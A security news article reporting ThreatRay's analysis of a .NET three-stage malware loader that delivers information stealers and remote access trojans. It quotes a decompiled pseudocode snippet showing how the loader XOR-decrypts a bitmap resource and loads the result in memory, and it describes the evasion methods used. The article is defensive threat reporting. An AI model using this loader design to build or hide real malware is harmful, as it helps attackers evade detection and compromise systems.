A sophisticated .NET multi-stage malware loader has been actively targeting Windows systems since early 2022, serving as a distribution channel for dangerous payloads including information stealers and remote access trojans.

This loader employs a complex three-stage deployment mechanism that helps it evade detection while delivering malicious software to compromised machines.

The threat has been continuously evolving, with recent versions implementing more advanced obfuscation techniques to hide their activities from security solutions.

The malware begins its infection chain with a seemingly innocuous .NET executable that contains encrypted components of subsequent stages.

While earlier variants embedded the second stage as hardcoded strings, newer versions have adopted more sophisticated concealment methods, hiding malicious code within bitmap resources to avoid triggering security alerts.

This evolution demonstrates the operators’ commitment to maintaining the loader’s effectiveness against modern security solutions.

ThreatRay researchers identified this loader through code reuse analysis, establishing connections between approximately 20,000 samples collected over a three-year period.

Their tracking revealed that despite frequent changes to the first two stages, the third stage maintains a relatively stable code structure, providing a consistent signature for detection.

The research team noted that the primary value of monitoring this loader lies in obtaining fresh samples and indicators of compromise rather than early detection of new malware families.

The impact of this loader has been significant across the cybersecurity landscape, with the malware predominantly distributing commodity threats including AgentTesla, Formbook, Remcos, and 404Keylogger.

Multiple Stages

Statistical analysis covering March 2022 through February 2025 shows consistent deployment patterns for these payloads, highlighting the loader’s reliability as a malware delivery mechanism for cybercriminals.

The loader’s technical sophistication is most evident in its staged execution process. The initial .NET executable extracts and decrypts embedded data before executing the second stage in memory.

This second stage, a .NET DLL, processes three crucial parameters to locate and XOR-decrypt a bitmap resource from the first stage, as shown in the code example below:-

public static void main(string ResourceName, string XORKey, string ModuleName)
{
    MainForm.loops_1(); // loops and arithmetic operations
    MainForm.sleep(); // sleeps several seconds
    ResourceName = MainForm.decode_string(ResourceName);
    MainForm.loops_2(); // loops and arithmetic operations
    XORKey = MainForm.decode_string(XORKey);
    Bitmap bitmap = MainForm.get_resource(ResourceName, ModuleName);
    MainForm.loops_1(); // loops and arithmetic operations
    byte[] array = MainForm.convert_bitmap_to_array(bitmap);
    array = MainForm.decrypt_array(array, XORKey);
    Assembly assembly = MainForm.assembly_load(array);
    MainForm.get_type_20_method_29_and_invoke(assembly);
    MainForm.loops_2(); // loops and arithmetic operations
    MainForm.exit();
}

The third stage then manages the deployment of the final payload in memory, completing the infection chain while minimizing detection risk.

This carefully orchestrated process demonstrates the sophisticated techniques modern malware employs to compromise systems while remaining undetected.

How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers